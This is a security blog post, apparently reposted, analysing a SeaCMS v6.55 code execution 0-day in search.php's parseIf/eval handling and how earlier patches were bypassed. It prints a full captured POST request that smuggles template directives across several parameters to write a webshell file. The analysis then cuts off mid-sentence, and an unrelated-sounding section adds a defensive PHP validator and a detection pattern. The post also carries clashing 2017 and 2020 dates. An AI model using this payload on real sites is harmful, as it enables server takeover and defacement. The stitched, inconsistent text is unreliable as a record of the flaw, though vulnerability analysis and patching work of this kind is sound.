Hacking Book | Free Online Hacking Learning


Jiaotu Technology - Natural Selection Laboratory » Ocean CMS (SeaCMS) v6.55 arbitrary code execution vulnerability and its patch bypass method

Posted by bassolino at 2020-02-27


Recently, one of our security hosting customers reported that their server had been attacked: the intruders uploaded a webshell and tampered with the content of the website. After we installed the Cloud Lock protection software for the customer, it intercepted an attack exploiting a 0-day vulnerability in Ocean CMS (SeaCMS). SeaCMS is a video-on-demand system built for webmasters with differing needs, and it holds a large market share among film and TV CMSes. Its official site is http://www.seacms.net/

Several old vulnerabilities in Ocean CMS (SeaCMS) and how they were fixed

In February 2017, a front-end getshell vulnerability was disclosed in SeaCMS 6.45; see http://blog.csdn.net/qq_/article/details/76595817 for details. The root cause is that search.php does not filter user input, so the order parameter submitted by the attacker reaches the parseIf function, which executes it via eval. The official fix in version 6.46 filtered the user-supplied parameters and limited their length to 20 characters. That fix does not close the vulnerability, because several user-supplied parameters are concatenated during the replacement step, so the patch can be bypassed. On August 7 the vendor released version 6.54 to fix the vulnerability again, adding the following line:

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";

In other words, the order parameter may now only take one of three fixed values, which blocks attacks through order but does not address the other parameters that still reach the parseIf function.

Analysis of the 0-day vulnerability in Ocean CMS (SeaCMS)

The attack payload we captured is as follows:

POST /search.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1317
Connection: keep-alive
Upgrade-Insecure-Requests: 1

searchword={if{searchpage:year}&searchtype=5&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=file_p&9[]=ut_contents('./data/cache/wee.&9[]=php',base&9[]=64_decode('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'));ec&9[]=ho(md5(123));exit;

As you can see, attack
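The 6.54 patch quoted above allowlists only the order parameter, while the captured request pushes template directives through searchword, year, area, letter, yuyan, jq and ver instead. The following is an added example written for this page; it is neither SeaCMS code nor the vendor's patch. It applies the same allowlist idea to every search parameter, rejects array-valued fields such as 9[], and adds a detection helper that flags any value carrying a template directive, whichever parameter delivers it. The parameter names are taken from the captured request; the accepted character classes and length limits are assumptions chosen for illustration, not values from the project.

```php
<?php
// Added example for this page: not SeaCMS code and not the vendor's patch.
// Allowlist validation for search.php parameters before any of them can
// reach template processing (parseIf/eval). Parameter names mirror the
// captured request; the accepted patterns are assumptions for illustration.

// Mirrors the 6.54 patch: order may only be one of three fixed values.
function validate_order($order)
{
    $allowed = ['commend', 'time', 'hit'];
    return (is_string($order) && in_array($order, $allowed, true)) ? $order : '';
}

// Per-parameter character classes (assumed). Braces, quotes, $ and
// parentheses are never allowed, so no value can carry a {tag} or code
// fragment into the template.
function search_param_rules()
{
    return [
        'searchword' => '/^[\p{L}\p{N} ._-]{0,60}$/u',
        'searchtype' => '/^[0-9]{1,2}$/',
        'year'       => '/^([0-9]{4})?$/',
        'area'       => '/^[\p{L}]{0,20}$/u',
        'letter'     => '/^[A-Za-z]?$/',
        'yuyan'      => '/^[\p{L}]{0,20}$/u',
        'jq'         => '/^[0-9]{0,4}$/',
        'ver'        => '/^[\p{L}\p{N}]{0,20}$/u',
    ];
}

// Returns a cleaned copy containing only known parameters; anything that
// fails its rule, or arrives as an array (e.g. 9[]=...), becomes ''.
function validate_search_params(array $post)
{
    $clean = [];
    foreach (search_param_rules() as $name => $re) {
        $value = isset($post[$name]) ? $post[$name] : '';
        $clean[$name] = (is_string($value) && preg_match($re, $value) === 1) ? $value : '';
    }
    $clean['order'] = validate_order(isset($post['order']) ? $post['order'] : '');
    return $clean;
}

// Detection helper for access logs or a WAF hook: true when a value
// contains a template directive such as "{if" or "{searchpage:",
// regardless of which parameter carried it. Arrays are searched too.
function contains_template_directive($value)
{
    if (is_array($value)) {
        foreach ($value as $v) {
            if (contains_template_directive($v)) {
                return true;
            }
        }
        return false;
    }
    return is_string($value) && preg_match('/\{(?:if\b|[A-Za-z_]+:)/', $value) === 1;
}

// Constructed sample requests (not real traffic).
$benign  = ['searchword' => '黑客帝国', 'searchtype' => '5', 'year' => '2017', 'order' => 'time'];
$hostile = ['searchword' => '{if{searchpage:year}', 'year' => ':e{searchpage:area}}',
            'order' => 'x', '9' => ['a', 'b']];

foreach (['benign' => $benign, 'hostile' => $hostile] as $label => $req) {
    $flagged = false;
    foreach ($req as $v) {
        $flagged = $flagged || contains_template_directive($v);
    }
    echo $label, ': directive=', var_export($flagged, true), ' cleaned=',
         json_encode(validate_search_params($req), JSON_UNESCAPED_UNICODE), PHP_EOL;
}
```

The validator is meant to run before search.php hands any value to the template layer, so that even a parameter the 6.54 patch did not cover cannot smuggle a {tag}; the detection helper is separate so that it can also be applied to historical request logs when checking whether an installation was already targeted.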

Posted on October 17, 2017 at 4:29 PM by admin · permalink · in: Web Security